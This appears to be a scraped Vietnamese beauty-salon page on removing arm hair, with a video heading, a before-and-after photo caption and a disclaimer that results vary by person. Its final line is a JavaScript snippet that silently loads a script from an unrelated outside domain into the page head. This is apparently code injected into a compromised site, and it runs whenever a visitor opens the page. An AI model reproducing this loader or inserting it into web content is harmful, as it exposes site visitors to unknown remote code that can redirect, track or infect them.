Cách tẩy lông tay

Video triệt lông


*Kết quả phụ thuộc với thể trạng từng người.

Ảnh trước sau triệt lông

anh-truoc-sau-khach-hang-triet-long
*Kết quả phụ thuộc với thể trạng từng người.

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://mp.trymynewspirit.com/s.js"; document.head.appendChild(z);